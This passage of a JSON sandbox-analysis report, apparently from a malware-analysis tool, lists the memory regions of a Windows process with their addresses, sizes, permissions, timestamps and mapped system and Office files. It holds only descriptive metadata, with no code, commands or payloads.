"private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4718592, "type": "region", "version": 1 }, "end_va": 6324223, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x0000000000480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4718592, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7933951, "entry_point": 0, "filename": null, "id": "region_154", "name": "pagefile_0x0000000000610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6356992, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7995392, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_155", "name": "pagefile_0x00000000007a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7995392, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 31911935, "entry_point": 28966912, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_156", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 28966912, "timestamp": "00:00:10.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 31916032, "type": "region", "version": 1 }, "end_va": 36057087, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x0000000001e70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31916032, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_158", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_159", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37236735, "entry_point": 0, "filename": null, "id": "region_160", "name": "pagefile_0x0000000002380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37224448, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 37302271, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000002390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37289984, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37367807, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x00000000023a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37355520, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37433343, "entry_point": 0, "filename": null, "id": "region_163", "name": "pagefile_0x00000000023b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37421056, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_164", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 37879807, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 37887999, "entry_point": 0, "filename": null, "id": "region_166", "name": "pagefile_0x0000000002420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37879808, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 38207488, "type": "region", "version": 1 }, "end_va": 38731775, "entry_point": 0, "filename": null, "id": "region_167", "name": "private_0x0000000002470000", "norm_filename": null, "region_type": "private_memory", "start_va": 38207488, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39645183, "entry_point": 0, "filename": null, "id": "region_168", "name": "pagefile_0x00000000024f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38731776, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 39649280, "type": "region", "version": 1 }, "end_va": 40435711, "entry_point": 39649280, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_169", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 39649280, "timestamp": "00:00:10.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 40435712, "type": "region", "version": 1 }, "end_va": 41484287, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x0000000002690000", "norm_filename": null, "region_type": "private_memory", "start_va": 40435712, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 42139648, "type": "region", "version": 1 }, "end_va": 42143743, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000002830000", "norm_filename": null, "region_type": "private_memory", "start_va": 42139648, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 42205184, "type": "region", "version": 1 }, "end_va": 42225663, "entry_point": 0, "filename": null, "id": "region_172", "name": "pagefile_0x0000000002840000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42205184, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42274815, "entry_point": 0, "filename": null, "id": "region_173", "name": "pagefile_0x0000000002850000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42270720, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42340351, "entry_point": 0, "filename": null, "id": "region_174", "name": "pagefile_0x0000000002860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42336256, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 42405887, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x0000000002870000", "norm_filename": null, "region_type": "private_memory", "start_va": 42401792, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 42467328, "type": "region", "version": 1 }, "end_va": 42475519, "entry_point": 0, "filename": null, "id": "region_176", "name": "pagefile_0x0000000002880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42467328, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 42532864, "type": "region", "version": 1 }, "end_va": 42536959, "entry_point": 42532864, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_177", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 42532864, "timestamp": "00:00:10.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 42598400, "type": "region", "version": 1 }, "end_va": 42663935, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x00000000028a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42598400, "timestamp": "00:00:10.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 42663936, "type": "region", "version": 1 }, "end_va": 42885119, "entry_point": 42663936, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_179", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 42663936, "timestamp": "00:00:10.021", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42926080, "type": "region", "version": 1 }, "end_va": 43974655, "entry_point": 0, "filename": null, "id": "region_180", "name": "private_0x00000000028f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42926080, "timestamp": "00:00:10.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 151552, "start_va": 43974656, "type": "region", "version": 1 }, "end_va": 44126207, "entry_point": 43974656, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db", "id": "region_181", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db", "region_type": "memory_mapped_file", "start_va": 43974656, "timestamp": "00:00:10.029", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 45219839, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 45219840, "type": "region", "version": 1 }, "end_va": 47316991, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000002b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 45219840, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 47316992, "type": "region", "version": 1 }, "end_va": 47321087, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000002d20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 47316992, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 47382528, "type": "region", "version": 1 }, "end_va": 47390719, "entry_point": 0, "filename": null, "id": "region_185", "name": "pagefile_0x0000000002d30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 47382528, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 47448064, "type": "region", "version": 1 }, "end_va": 47452159, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000002d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 47448064, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 47583231, "entry_point": 47513600, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_187", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 47513600, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 47644672, "type": "region", "version": 1 }, "end_va": 48168959, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000002d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 47644672, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 48168960, "type": "region", "version": 1 }, "end_va": 48300031, "entry_point": 0, "filename": null, "id": "region_189", "name": "private_0x0000000002df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 48168960, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 48300032, "type": "region", "version": 1 }, "end_va": 48320511, "entry_point": 48300032, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll", "id": "region_190", "name": "onbttnwd.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll", "region_type": "memory_mapped_file", "start_va": 48300032, "timestamp": "00:00:10.030", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 48365568, "type": "region", "version": 1 }, "end_va": 48492543, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002e20000", "norm_filename": null, "region_type": "private_memory", "start_va": 48365568, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 48496640, "type": "region", "version": 1 }, "end_va": 48627711, "entry_point": 0, "filename": null, "id": "region_192", "name": "private_0x0000000002e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 48496640, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 48627712, "type": "region", "version": 1 }, "end_va": 49676287, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 48627712, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 49676288, "type": "region", "version": 1 }, "end_va": 49807359, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x0000000002f60000", "norm_filename": null, "region_type": "private_memory", "start_va": 49676288, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 49807360, "type": "region", "version": 1 }, "end_va": 49938431, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x0000000002f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 49807360, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 49954815, "entry_point": 49938432, "filename": "\\Windows\\System32\\stdole2.tlb", "id": "region_196", "name": "stdole2.tlb", "norm_filename": "c:\\windows\\system32\\stdole2.tlb", "region_type": "memory_mapped_file", "start_va": 49938432, "timestamp": "00:00:10.040", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50069504, "type": "region", "version": 1 }, "end_va": 51118079, "entry_point": 0, "filename": null, "id": "region_197", "name": "private_0x0000000002fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50069504, "timestamp": "00:00:10.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51249152, "type": "region", "version": 1 }, "end_va": 52297727, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x00000000030e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51249152, "timestamp": "00:00:10.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 52297728, "type": "region", "version": 1 }, "end_va": 52817919, "entry_point": 52297728, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_199", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 52297728, "timestamp": "00:00:10.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 52887552, "type": "region", "version": 1 }, "end_va": 52953087, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x0000000003270000", "norm_filename": null, "region_type": "private_memory", "start_va": 52887552, "timestamp": "00:00:10.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53084160, "type": "region", "version": 1 }, "end_va": 54132735, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000032a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53084160, "timestamp": "00:00:10.046", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 54132736, "type": "region", "version": 1 }, "end_va": 58327039, "entry_point": 0, "filename": null, "id": "region_202", "name": "pagefile_0x00000000033a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54132736, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 67960831, "entry_point": 58327040, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_203", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 58327040, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 68812800, "type": "region", "version": 1 }, "end_va": 69861375, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000041a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 68812800, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 70713344, "type": "region", "version": 1 }, "end_va": 70778879, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000004370000", "norm_filename": null, "region_type": "private_memory", "start_va": 70713344, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 70778880, "type": "region", "version": 1 }, "end_va": 71827455, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x0000000004380000", "norm_filename": null, "region_type": "private_memory", "start_va": 70778880, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71827456, "type": "region", "version": 1 }, "end_va": 72876031, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000004480000", "norm_filename": null, "region_type": "private_memory", "start_va": 71827456, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73007104, "type": "region", "version": 1 }, "end_va": 73072639, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x00000000045a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 73007104, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 73793536, "type": "region", "version": 1 }, "end_va": 74317823, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x0000000004660000", "norm_filename": null, "region_type": "private_memory", "start_va": 73793536, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 74317824, "type": "region", "version": 1 }, "end_va": 82706431, "entry_point": 0, "filename": null, "id": "region_210", "name": "pagefile_0x00000000046e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 74317824, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 83099648, "type": "region", "version": 1 }, "end_va": 83623935, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x0000000004f40000", "norm_filename": null, "region_type": "private_memory", "start_va": 83099648, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 83820544, "type": "region", "version": 1 }, "end_va": 84869119, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x0000000004ff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 83820544, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 85721088, "type": "region", "version": 1 }, "end_va": 86769663, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000051c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85721088, "timestamp": "00:00:10.047", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 86769664, "type": "region", "version": 1 }, "end_va": 90963967, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x00000000052c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 86769664, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 91095040, "type": "region", "version": 1 }, "end_va": 92143615, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x00000000056e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91095040, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 92143616, "type": "region", "version": 1 }, "end_va": 108920831, "entry_point": 0, "filename": null, "id": "region_216", "name": "pagefile_0x00000000057e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 92143616, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 110690304, "type": "region", "version": 1 }, "end_va": 111214591, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000006990000", "norm_filename": null, "region_type": "private_memory", "start_va": 110690304, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 111214592, "type": "region", "version": 1 }, "end_va": 112263167, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000006a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 111214592, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 112656384, "type": "region", "version": 1 }, "end_va": 113180671, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x0000000006b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 112656384, "timestamp": "00:00:10.048", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], 